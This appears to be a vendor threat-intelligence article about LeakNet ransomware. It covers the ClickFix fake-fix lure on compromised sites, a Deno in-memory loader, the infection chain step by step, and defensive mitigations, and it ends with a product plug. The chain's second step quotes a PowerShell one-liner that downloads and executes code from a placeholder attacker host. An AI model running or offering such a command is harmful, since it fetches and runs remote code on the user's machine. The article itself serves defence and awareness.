LeakNet Ransomware Exploits ClickFix Tactics and Deno Loader

Introduction

In the ever‑evolving landscape of cybercrime, ransomware operators constantly adapt their tactics to stay ahead of defenses. The group behind LeakNet – a relatively new but increasingly prolific ransomware family – has recently adopted a two‑pronged approach that blends classic social engineering with cutting‑edge runtime techniques. By exploiting the ClickFix ploy on compromised web pages and delivering a Deno in‑memory loader, LeakNet sidesteps many traditional security controls and accelerates the infection timeline.

This article dissects the new attack chain, explains why the ClickFix method is gaining traction, and highlights the technical nuances of the Deno loader. We also provide practical mitigation steps for security teams and discuss what the emergence of this hybrid technique means for the broader ransomware ecosystem.

ClickFix: A Deceptive Social‑Engineering Vector

ClickFix is a form of social engineering that tricks users into executing a harmless‑looking command to “fix” an imagined problem on their computer. The attacker typically hijacks a legitimate‑looking website, injects a pop‑up or banner that claims the visitor’s system is infected or misconfigured, and then provides a short command line snippet to resolve the issue. The snippet is, in reality, a gateway to malicious code.

• Delivery medium: Compromised or maliciously crafted websites that attract visitors via SEO poisoning, malvertising, or compromised ad networks.
• Psychological trigger: Fear of system instability combined with a promise of an easy, one‑click fix.
• Technical execution: The displayed command typically invokes a PowerShell or Bash script that reaches out to a remote server to fetch additional payloads.

What makes ClickFix especially dangerous is its reliance on user interaction rather than exploiting a software vulnerability. This means that traditional vulnerability scanners and exploit‑prevention tools often miss the initial foothold entirely. Moreover, because the command is presented as a benign troubleshooting step, many users – especially those with limited technical knowledge – comply without a second thought.

Deno In‑Memory Loader: Evading Traditional Defenses

Once the victim executes the ClickFix command, the script contacts a command‑and‑control (C2) server that delivers a payload written in Deno – a modern, secure runtime for JavaScript and TypeScript. Deno’s design emphasizes sandboxing, permission‑based execution, and a single executable binary, making it an attractive choice for threat actors seeking to minimize their footprint.

The Deno loader employed by LeakNet operates entirely in memory. Instead of writing the malicious code to disk, the loader streams the bytecode directly into the process’s address space, where it is executed on the fly. This in‑memory technique offers several advantages for the attacker:

• File‑less execution: Antivirus solutions that rely on signature‑based scanning of files on disk are bypassed.
• Reduced forensic artifacts: Without a written executable, post‑incident investigators have fewer artefacts to trace.
• Rapid deployment: The payload can be fetched, compiled, and executed in seconds, shortening the window for detection.

Deno also supports TypeScript out of the box, allowing the attackers to write more maintainable code while still delivering a compiled JavaScript bundle to the victim. The runtime’s built‑in security flags (e.g., --allow-net, --allow-read) can be selectively enabled, giving the ransomware operators fine‑grained control over which system resources the malicious code can touch.

LeakNet’s Evolving Attack Chain

The combination of ClickFix and a Deno in‑memory loader represents a significant evolution in LeakNet’s operational playbook. Below is a step‑by‑step breakdown of the typical infection flow:

1. Initial lure: Victims land on a compromised website that displays a ClickFix banner claiming a critical error.
2. User interaction: The banner presents a short command (e.g., powershell -c "iex ((New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader'))") that the user copies and runs.
3. Bootstrap script: The PowerShell command fetches a tiny bootstrap script from the attacker’s server.
4. Deno payload retrieval: The bootstrap script downloads a Deno binary (or uses a pre‑installed Deno) and instructs it to pull a TypeScript payload from the C2.
5. In‑memory execution: Deno compiles the TypeScript in memory and executes it without ever writing the compiled JavaScript to disk.
6. Ransomware deployment: The in‑memory code performs system enumeration, encrypts files, drops ransom notes, and optionally exfiltrates data.

Because each stage is lightweight and can be delivered over HTTPS, the attack is difficult to distinguish from legitimate traffic. Moreover, the use of Deno—a runtime not yet widely monitored by endpoint detection platforms—adds an extra layer of obscurity.

Mitigation Strategies and Best Practices

Defending against this hybrid technique requires a blend of user education, network hygiene, and advanced detection capabilities:

• Security awareness training: Reinforce the principle that users should never execute commands copied from web pages, especially those that claim to “fix” an issue.
• Web filtering and DNS sinkholing: Block known malicious domains and employ threat‑intel feeds that flag sites used for ClickFix campaigns.
• Application control policies: Restrict the execution of PowerShell, cmd.exe, and especially Deno unless explicitly approved for business purposes.
• Endpoint detection and response (EDR): Deploy solutions capable of monitoring in‑memory activity, script execution, and anomalous network connections to uncommon ports or endpoints.
• Network traffic analysis: Use TLS inspection to detect suspicious downloads of Deno binaries or TypeScript payloads, even when encrypted.
• Patch management: Keep browsers, plugins, and content‑management systems up to date to reduce the risk of website compromise that could host ClickFix banners.

Organizations should also consider implementing a “zero‑trust” approach for script execution, requiring multi‑factor authentication for any privileged command line activity. Logging all PowerShell and Deno command invocations can provide valuable forensic data if an incident occurs.

Conclusion

LeakNet’s recent campaign demonstrates how ransomware operators are blending classic social‑engineering tricks with advanced, file‑less execution techniques to outmaneuver traditional defenses. By exploiting the ClickFix ploy on compromised websites and delivering a Deno in‑memory loader, the group achieves rapid, stealthy infections that challenge both user awareness programs and technical controls.

Organizations that prioritize continuous security education, enforce strict script execution policies, and adopt modern EDR solutions capable of detecting in‑memory activity will be better positioned to thwart such hybrid attacks. As the threat landscape evolves, leveraging AI‑driven automation and threat‑intelligence platforms—like those offered by Grivyonx Cloud—can help security teams stay ahead of adversaries without overwhelming analysts with alerts.